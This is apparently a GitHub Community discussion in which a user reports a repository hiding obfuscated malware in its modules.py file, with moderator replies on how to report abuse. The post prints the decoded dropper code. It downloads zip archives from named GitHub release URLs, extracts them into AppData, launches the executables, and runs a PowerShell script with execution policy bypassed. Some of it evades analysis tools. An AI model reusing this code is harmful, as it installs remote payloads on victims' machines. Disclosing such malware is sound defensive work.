### DISCUSSION TITLE
Found Virus hidden in a repo.

### DISCUSSION THREAD

**Discussion by JohnMapleDev** [community/community#133376] [New to GitHub]
I found a virus in this repo: https://github.com/NearZeK/bnb-finder
the virus is hidden in the modules.py file. The file is "encrypted" using base64 and base58.
How do I report this repo? The numbers of stars are rising so I assume more and more people download it.
The code that are encrypted look like this:
`import sys
import time
import zipfile
import requests
import os
import subprocess
"""
def check():
for proc in psutil.process_iter():
processName = proc.name()
processName = processName.lower()
if ("wireshark" in processName or "processhacker" in processName or "fiddler" in processName or "procexp" in processName or "procmon" in processName or "sysmon" in processName):
sys.exit()
check()
"""
path = os.getenv('APPDATA')

username = os.getlogin()
airdrops_path = f"C:\Users\{username}\AppData\Roaming\CRT\airdrops.exe"
if not os.path.exists(airdrops_path):
url = 'https://github.com/limerman/BruteFb/releases/download/b/lostsoul.zip'
response = requests.get(url)
if response.status_code == 200:
"""
with open(path + "/data.zip", "wb") as file:
file.write(response.content)
zip_path = os.path.join(path, "data.zip")Р·
extract_dir = path + "/DATA"
os.makedirs(extract_dir, exist_ok=True)
with zipfile.ZipFile(zip_path, 'r') as zip_ref:
zip_ref.extractall(extract_dir)
time.sleep(1)
os.startfile(f"C:\Users\{username}\AppData\Roaming\DATA\lostsoul.exe")
path_powershell = f"C:\Users\{username}\AppData\Roaming\DATA\conhost.ps1"
url_pow = "https://github.com/limerman/BruteFb/releases/download/b/conhost.ps1"
respow = requests.get(url_pow)
with open(path_powershell, "wb") as file_pow:
file_pow.write(respow.content)
"""
url = 'https://github.com/limerman/BruteFb/releases/download/b/airdrops.zip'
response = requests.get(url)
with open(path + "/main.zip", "wb") as file:
file.write(response.content)
zip_path = os.path.join(path, "main.zip")
extract_dir = path + "/CRT"
os.makedirs(extract_dir, exist_ok=True)
with zipfile.ZipFile(zip_path, 'r') as zip_ref:
zip_ref.extractall(extract_dir)
time.sleep(1)
"""
subprocess.run(["powershell", "-ExecutionPolicy", "Bypass", "-File", path_powershell])
time.sleep(1)
os.remove(path_powershell)
"""
os.startfile(airdrops_path)
elif response.status_code == 404:
url = 'https://github.com/directuser/mnemonic-checker/releases/download/1/airdrops.zip'
response = requests.get(url)
with open(path + "/main.zip", "wb") as file:
file.write(response.content)
zip_path = os.path.join(path, "main.zip")
extract_dir = path + "/CRT"
os.makedirs(extract_dir, exist_ok=True)
with zipfile.ZipFile(zip_path, 'r') as zip_ref:
zip_ref.extractall(extract_dir)
time.sleep(1)
os.startfile(airdrops_path)
"""
url = 'https://github.com/directuser/mnemonic-checker/releases/download/1/lostsoul.zip'
response = requests.get(url)
with open(path + "/data.zip", "wb") as file:
file.write(response.content)
zip_path = os.path.join(path, "data.zip")
extract_dir = path + "/DATA"
os.makedirs(extract_dir, exist_ok=True)
with zipfile.ZipFile(zip_path, 'r') as zip_ref:
zip_ref.extractall(extract_dir)
time.sleep(1)
os.startfile(f"C:\Users\{username}\AppData\Roaming\DATA\lostsoul.exe")
path_powershell = f"C:\Users\{username}\AppData\Roaming\DATA\conhost.ps1"
url_pow = "https://github.com/directuser/mnemonic-checker/releases/download/1/conhost.ps1"
respow = requests.get(url_pow)
with open(path_powershell, "wb") as file_pow:
file_pow.write(respow.content)
time.sleep(1)
"""
# subprocess.run(["powershell", "-ExecutionPolicy", "Bypass", "-File", path_powershell])
# time.sleep(1)
# os.remove(path_powershell)`

**Comment by isPique** [comment]
1- Go to the [GitHub Abuse Report Form](https://github.com/contact/report-abuse).
2- Fill in the details about the repository, including the URL (https://github.com/NearZeK/bnb-finder).
3- Describe the issue clearly, mentioning that the `modules.py` file contains obfuscated code which appears to download and execute potentially harmful files.
4- Include the details of the obfuscated code and its behavior as you did in your message.

**Comment by ghostinhershell** [comment]
Hi @JohnMapleDev, 👋🏾 We really appreciate you flagging this. The best route to get this to the proper GitHub team is to use our [abuse reporting tools](https://docs.github.com/en/communities/maintaining-your-safety-on-github/reporting-abuse-or-spam). Here's all the info:

- [Reporting abuse or spam](https://docs.github.com/en/communities/maintaining-your-safety-on-github/reporting-abuse-or-spam)
- [Reporting a user](https://docs.github.com/en/communities/maintaining-your-safety-on-github/reporting-abuse-or-spam#reporting-a-user)
- [Reporting an issue or pull request](https://docs.github.com/en/communities/maintaining-your-safety-on-github/reporting-abuse-or-spam#reporting-an-issue-or-pull-request)
- [Reporting a comment](https://docs.github.com/en/communities/maintaining-your-safety-on-github/reporting-abuse-or-spam#reporting-a-comment)

You can report behavior and content that violates community guidelines and terms. We are going to close this post, but for this and any future incidents, please refer to the links above.

Thank you!
